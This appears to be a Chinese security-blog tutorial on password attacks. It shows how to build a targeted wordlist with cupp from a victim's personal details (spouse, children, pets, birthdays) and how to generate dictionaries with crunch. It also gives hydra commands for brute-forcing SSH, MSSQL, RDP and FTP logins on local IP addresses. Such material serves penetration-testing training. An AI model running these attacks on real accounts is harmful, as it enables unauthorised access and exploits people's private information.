1、免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途。
2、内容速览
易破解的口令如下:
cupp是一款基于python编写的可交互性的密码字典生成工具。结合社会工程学,你会获得一份根据个人信息生成的专属字典。
与传统字典相比,其优势在于准确率更高
Kali默认没有安装,使用如下命令安装:
apt-get install cupp
使用方法 cupp -i
即可按照提示步骤生成字典:
之后就会生成成功
这是它的提示:
-i 是按照提示步骤实施
-w 是引入字典
-l 是下载网上字典
-a 是来自数据库直接解析密码
运行命令"cupp -i",填写受害人姓、名、绰号、生日。**
2.填写受害人配偶的名字、绰号、生日
3.填写孩子的名字、绰号、生日
4.填写宠物的名字以及公司的名字
5.是否添加一些关于受害人的关键词
6.是否在密码结尾添加一些特殊字符
7是否在密码结尾添加一些随机数字
8.填写"y",生成字典,可以在root目录下查看
1.运行命令 "cupp -l" ,填写你想要下载字典的序号,下载完成的字典保存在"/root/dictionaries/chinese"目录下。
kali自带,无需安装。 详细内容见 man crunch
crunch <min> <max> [<charset string>] [options]
:min和max分别是密码的最小长度和最大长度,后面可以加上字符集和其他选项。-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,记包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/usr/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-o 将密码保存到指定文件
-q 读取密码文件,即读取pass.txt
-r 定义重复一个字符串就重新开始
-s 指定一个开始的字符
-t 指定密码输出的格式
-u 禁止打印百分比
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
-l 生成特殊字符
-p 指定生成元素
•
特殊字符
%代表数字
^代表特殊符号
@代表小写字母
,代表大写字母
crunch 2 4
crunch 1 2 ab
crunch 1 6 abc\
crunch 3 3 –f /usr/share/crunch/charset.lst mixalpha-numeric-symbol14 >1.txt 注:charset.ls 的目录为 /usr/share/crunch/charset.lst
crunch 8 8 -f charset.lst mixalpha-numeric-symbol14 -t @@jerry@ -s abjerryc >2.txt 注:-t 简单参数详解:%:数字 ^:特殊字符 @:小写字母 ,:大写字母
crunch 2 3 -f charset.lst ualpha -s BB
crunch 1 5 -o START -c 6000 -z bzip2
crunch 4 5 -b 20mib -o START
crunch 3 3 abc + 123 @#! -t @%^
注意:如果使用需要限定字符 则直接加需要限定的字符,
如果是要限定数字的话 那么必须在限定的 数字 前面加上 "+" 。
crunch 7 7 –t ddd^,@% -p a b c
注意:-t 后面的 "d" 是从 -p 里面的字符串随机组合,1个d就代表1位
crunch 5 5 -d 2@ -t @@@%%
crunch 4 4 -f unicode_test.lst the-greeks -t @@%% -l @xdd
-l 指定一个用户名
-p指定一个密码
-P指定密码字典
-L 指定用户名字典
-vV显示爆破细节
-o保存爆破结果
-f找到正确密码就停止爆破
-e n(null)、s(same)、r(反向)
-e nsr
-t 线程
破解ssh:hydra -l zeker62 -P pwd.dic 192.168.223.133 ssh -vV -f -e nsr
结果,破解成功:
破解MSSQL 口令
hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV
破解RDP 口令
hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV
破解FTP 口令
hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.16 8.1.150 ftp -vV